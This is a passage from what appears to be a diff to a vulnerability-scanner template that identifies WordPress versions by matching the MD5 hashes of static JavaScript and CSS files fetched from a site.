- 4.7.19 + dsl: + - "(\"4cc64266f1b35a86c63cc1b2c42f7306\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"d39bc622e41df37d3f5e2e8fd20df836\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"43beb69ddff35f898e5b249f7b317ff1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"402b83d7eb8503875c7109fca9337099\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"a1db9e45185be361561f131088b9637b\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"015e26faffb2e80008b37b867a15a3bf\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"97f0a4cdbc02ea3e9875ffa2ec6a0337\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"4b6388358177afb0bb33fe7bf256e3b4\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"b4f6de1adf243fb1c4ca11109ca8358b\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"7e0f2194505d5542a2b80b0f0f08887c\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"3805f522ae8f28cc529ae905ccede61a\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"92121be15064830078f19c7f912bc5f9\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"58a57f957959b2418cc05b8df844f546\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"52d5d3f67a30c1ce0f451f08aa5b97ff\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"de06009e78fc399ac9a91a8f59cd8e07\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5a621bf06d20c5c3572adbc7d71f2b97\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/code-editor.js" + matchers: + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4368208ec74f238fc80ef7dc47b2aba6\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"776a99fab6e282246f5133bc46d0087e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"48424898ce3f9ea8bb373f8653282650\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ac8c9bc9b09d4fdf6bbf06313403eeeb\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a4f21e1c4ea627dfbd09891525f9eef1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/plugin-install.min.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"46ac03875245e24a0d1be489b6cb4c2f\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"3229e9c737c2c9a012354905b57df8da\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7129ef20998c3f2812fec0a81fd4f705\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"83cad000ff1742f350cbf5263cdea97e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7a6211c90a9364fa26b36f9866d53e9e\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"e976956cebb7ba13ce258a9d2cfa8dc3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"4c34cafa3f097dfd421dcc58356583e5\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"50652da46fc48b21ad901e98149bcd0c\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"19f4f7ff991851e77513e7d65c6b0430\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"783248774594b29ab9ebf6de3c9a38db\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"16ba1352fa10398697d8abdbeb096894\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"baba780d78f5d62abc5aad91f07d0c46\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"c10e07ae10cf119ed6c90ab69428e48d\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"304eb11b47e86474942ddb5d2f6c5c91\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2a7c386a71ce6d34ef8dd27a5bb6ffec\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b05faafd50075d11d8a5771c0d489b09\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4f051762ba5719d75fa25627517bea54\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-ajax-response.min.js" + matchers: + - type: dsl + name: 4.7 - 4.9.4 + dsl: + - "(\"d37497d8ac9cc91eacc91b76cbff30cc\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"055515cf4b20352a05672b64161f8a02\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5e0c8cadb7abf2ef05fbb9c04f2513f5\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"f64f062c6a647e25c7fe883edb139121\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"6243173bbe7318aa7b1702a90c4b0ccb\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"c97811c969982d3ec60a885c16333372\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"9bf9c718c9e841007b73e1f8194857b5\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"1da637535cdded009a8dde077e234430\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"20d3d94221f3642fe34a6e578c435dcb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"53941ae215227db2556187ffa881e4ad\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e42f27d6179a5d518c8a5fd7c6685926\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a5a0ff7a47fe825bc38732ef1a9b530f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"be4b510a3e27fc2ea617dfe8d10530fe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/nux/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"00c7a8bf8a43b2a6342ae12d8014b357\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"4c62cfc657f2833b0ec9aef2aceda18d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"093f88e78124c68bbc7f81cc9664985e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9909906d58e1ba6307562901842b0f36\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"67cb8b12c345e8450f290f84bf99c983\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/nux/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"2988ea994f3223b637ed87efb015941a\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"fe929a23a43a921c573d6dec065f4697\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2d2b907716b25ae5cd508979a8eeacaf\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4cddab9fc231f895027cdcd60ff893ad\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"04343da85c5e00bae45912a244abffb3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags-box.min.js" + matchers: + - type: dsl + name: 4.7.3 - 4.8.15 + dsl: + - "(\"abaa02b7bdeb06985ca76e06968b3f25\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"b1a623391a6e45e237c884963c3d86c5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1c02ad1f8935c4d4dce96815368a92e6\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"a446052ae0cf9947db74a78d2dfd1b1f\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"e5824b6ec80b938c3c17d7a19e78d9a9\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"01b149cd42ae563cc462f7e81384da3d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"096b6a30f90cb435d1be8013ddc685ba\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6213cd28dc4288286091b04c2c276e7e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"580ffdf678912278549e642083a40302\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"6c16b4618749725b12fe13abb7c42b2a\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"dc0f235b74febea2c205db39d7359331\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/clipboard.min.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"aaae8ad0eeed6275f0ef60bcc496c4fc\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8e6f346d35a9ca3d1189d623fff51b1e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"28a0a9788fc1686ef67f7cdd72b8626d\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"bbe1c0df780d9eb632ffa1bf16a1fa40\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js" + matchers: + - type: dsl + name: 4.7 - 5.3.6 + dsl: + - "(\"bbe31109bb4a2955ac73c0b0ac1e8d8c\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7dc53d12625ab07aae053c42d581a859\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d2b7eca9a8ae108ab66e5727394d236b\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"d4d46a49f3589ec1c136ab912a2da7ca\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b381c35db3e778ce91ddbf4a181d3428\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4513090604bf922d4ea86f931b979d8d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.3.6 + dsl: + - "(\"665ee57d23f6e1b6539fd1b0e62d31ab\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"bbdbfb09f97760f162e5e9b84733f059\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d4bbce6a05abc15f6708fa9bc8cc5f1e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.3.6 + dsl: + - "(\"720f7773fc0b0a8d79d4f3fc89658c1e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"27c923c8f48e2d0888c43528fa449921\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d52e2371982ef4384ca54592d96e64d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/masonry.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"5420b6516c14245b504e7240a8310f2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"69717d4569676f401e97dcec54f10ebc\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"6cb8bb7d4daad1989037e36a0cf08e01\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"c54e75edf5cbaf412bc16ba4145f6032\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d58f7afc0296717c2a7a93b01b569b40\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3b3fc826e58fc554108e4a651c9c7848\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/imagesloaded.min.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"d0c2c0d7e37652e66657c8c8d6376442\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"7e97ab52c3df75e9053002bb59f2cdd5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b89ed002fd8fa08062ac8018e5416432\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3a56752b736635bf69cb069b8818cbfd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-auth-check.js" + matchers: + - type: dsl + name: 4.5 - 5.0.11 + dsl: + - "(\"99500dd54adc76769e1a798a9725d765\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3fa71c823bf88630a96d37a0ce1ba695\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"a28190f5ed5d6bfa0702e414b65a2156\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"f1d3e9e205b2c0fecfd16283630f1a2b\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"a72545bc4f0ec2779a259c397112efd5\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"d92e8027e527bd17fad278c48962d397\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"76d4ccd556604992cb9380661a893995\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"6a7bedfefa2ca4e2dd8dc7075d5b1363\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/admin-bar.js" + matchers: + - type: dsl + name: 4.3 - 5.0.11 + dsl: + - "(\"d97a1899a7f641e693928f5a47c33de4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"33030beb6f04ff00e3921848ba5bbf48\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"0f097d201cb02ea92c179103eae598e7\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"25692c16854d4f5fd7be2ff45a825da9\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"e3614ae78ac77f5553cd2cea4fa45e4b\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"87155dc1915f0d675ab45859c63c29eb\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"af5814becbee54d645db60be9ad5c3d4\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"49282a3221d1602842f7b8387fd8c7fc\" == md5(body))" + - type: dsl + name: 5.1 - 5.3 + dsl: + - "(\"6de7978f0a6608308e9156f4a357ce26\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"d2a25830f7004da7b426e628e4d3642a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c63460232611aa5c8aa280b134df07da\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a50de863f3edfff3a0f8a3e59a4070cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/password-strength-meter.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"2847576ec45293ab96dc0030974e2629\" == md5(body))" + - type: dsl + name: 3.8 - 4.5.23 + dsl: + - "(\"4d912846975670c9e2232a19ef7bb41b\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"9d7b4897e430c5470062141631ddf6cf\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"b3d62fe0166b74696d6bc96159abdccd\" == md5(body))" + - type: dsl + name: 3.0 - 3.4.2 + dsl: + - "(\"fe72628809263f3d3dd7227053f9c9e5\" == md5(body))" + - type: dsl + name: 2.8 - 2.9.2 + dsl: + - "(\"21310235a8b2671858df84db50a44cb3\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"9fd543dc193265cafad84bd8a0d7f34d\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"5dabf5092e542062317b20b411e353ad\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"e95f7bfdde679787ce1dfa9ec54ea0fc\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"12680dac419ded545d7f0759cdef683b\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"733ef96794bb51fc1d65de2df4938827\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/word-count.js" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"5c34b03b6ec23142fc52a77a51dbd00a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"7717109f8797a1b6cffcaccd2f69181f\" == md5(body))" + - type: dsl + name: 4.3 - 4.6.20 + dsl: + - "(\"40855d5cebe963ddaa0f92f1f5aeebb9\" == md5(body))" + - type: dsl + name: 3.8 - 4.2.29 + dsl: + - "(\"66256995400e51a5f931a11bc11e1e4e\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"86f1a330bd23226e1e7f50887e7f9ab0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"bd315c9a2ccbf08260689037e63721ad\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"1f1fbcd7486060c4dbfdea32433cce24\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"a74398b6c7a69d86c66f1e2c2e763a36\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1c50ad62c2afa2b6a3b27f6389aa4f00\" == md5(body))" + - type: dsl + name: 2.6 - 2.6.5 + dsl: + - "(\"8041d069276b892b86066ef48173c94a\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a4dc4685332216c99b5efbcebf141d1a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e186134a25d7bf838c1cbb8dc3c10430\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"cb0d666642291b86e71d86f8fc85b196\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-custom-header.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"6e62551d535dc3b007870e89f881ee21\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"3e2d55e5318d81a5281421f688e58323\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"284b8547296847f3521f043cf87cdb34\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b6e71eabf6639d3cb46e2078d8467161\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"7f2b2cbe2196da8a4cd3ba7ecebd37bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-loader.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"3735895ce4bc1061b033b00ddadc22de\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7abf57ccc77b463cec220a6606154bc5\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"cc3c2444034208299c6df6cfc843e58a\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"2130932604d2718d1e9d11e800ab7e93\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"5c611eaec684f19737c160f5f01a485f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1378baafb8d7182238b30ec7c6e13022\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"a8081b20cf362f37400bea99ac2c844b\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"3e18e99953ef2c5dbe445865119db950\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"db7600d0c3cd3ee2578d361ff5c81d19\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"a2c8b624e5fad7d54a01eb87471d66b0\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"43b25764a6f643073ba0e4152c6365a6\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"639a08feb527f2c543772254b8d48925\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"fa60be36fa14ef21ddd1d2837a0791c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-pointer.js" + matchers: + - type: dsl + name: 3.8 - 4.8.15 + dsl: + - "(\"35cb8b380bbd1f2eaa723ac49ba5f3f0\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"9fb67c2257a8111e496014c2d2f3a930\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"44006ca7f608bdd5a0a6445d84dfa14d\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"4a48a19acf10e63f33393a9d9909b3bd\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"35383aaf79e2b149c48a6acbc6c83809\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"7c3581af000bc58db4f8129ba6cd12b2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b295c27568ad8a9020144eed882b0067\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"491c51dd0c5bad0de219ce8bba0ada64\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-util.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"91c322750bc80f1cacfd4f991e65a415\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"705199da293ca7cfc6e98ea0b52774cb\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"b1f5d3eba80a1f93e0253bc74991fbb1\" == md5(body))" + - type: dsl + name: 3.8 - 4.0.32 + dsl: + - "(\"521d8ade2d01d0a2c99efa64416e11fb\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"84caa80dc10abf7a7ffd94c56cc38af1\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"3ec17cf08572d621367a0573351441aa\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"2c02aa97431dfcc81a82c8f83ab1cd3b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e09a8ad377e8a1ca3b8159a936c30906\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"4d904aced6e332244a94fd2bacd3ec9d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview-widgets.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"436093edec320c9f9da76cee03deb3ac\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"fdeaa6b3ee156fd6aef890e09059efb6\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"76d31132f6e296d08e381be0da448404\" == md5(body))" + - type: dsl + name: 4.0 - 4.4.24 + dsl: + - "(\"a01ebc7a7becb4597d71d379bcdab4be\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c0e6272abe698aa445a21298fa79c358\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"8ff9fe7ca1dadd92d11ffa20b353c518\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"7a62917d11fdead57427817f23871ad5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7fa89954900ede4d882ee21e63c2cb15\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"79827dedd0eb15f0ee788ac363c326b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/deprecated-media-rtl.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"071db78449e52b5a8e4f74881f45ca76\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fddf44a35df34aa803d40aba646d7a6f\" == md5(body))" + - type: dsl + name: 4.2 - 4.4.24 + dsl: + - "(\"558fe352dfdab9790dab9710438af5a9\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"aec141ea70457e90d42dde854a175957\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ef3b13a4cb7395ecba135bf389e7294f\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"10accf784a72c030297a52b5a33ce42f\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"48e00fdbf199890d49677720c9a98ea3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f50a36e92153387a5adc0ac424ce5d63\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"fd551bbabf0a178005d74d2d994220b4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-tax.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"ec5818c45238461cbce1fee187236490\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0a60b48d0a2580ae43f1ed934f25e51a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"bff3a6a1fcc82259876743865f72d438\" == md5(body))" + - type: dsl + name: 4.4.2 - 4.4.24 + dsl: + - "(\"ce627f76baed7a7eb06da71509b066f2\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.1 + dsl: + - "(\"dff660355620645c0c23307d49deff92\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"259a386f7971daa9c9b44d20004f1340\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a920718b385e75e18193ee293ffdfd3c\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"169c038f805a493d8b5383670a02d89c\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"a0c85dc2666073624ce26e38d36b32f3\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"0a13ec480d142c7f380a97b6e2459736\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"52a3f5f1b0171e70baa94896642326f0\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"1e052a12b20c1dfabb85a4c0da26a1cc\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"f96182e442bef20e0a110399a1ea5d98\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"430b4ef17a75f9970241e7bb358faaae\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"8419d6590d1eacdd654695b963d1bc01\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"867a5f6f312d237c140168c4d4105c6d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"75694df32dda3134f2ae3395701421f3\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"33d9729301a783c6561954a1451119a4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e8705cf154a08cc1027893e287a40ff4\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"be41ecebc432f794a5c5fdb1c629ee71\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/color-picker.js" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"05c7f6756aeac3f2cf7d276af6881826\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"8581b5c29da7d13a5f572d065a4ed66a\" == md5(body))" + - type: dsl + name: 4.1 - 4.3.25 + dsl: + - "(\"0e948ad7ea32644d4dcadc0f54fac1e3\" == md5(body))" + - type: dsl + name: 4.0 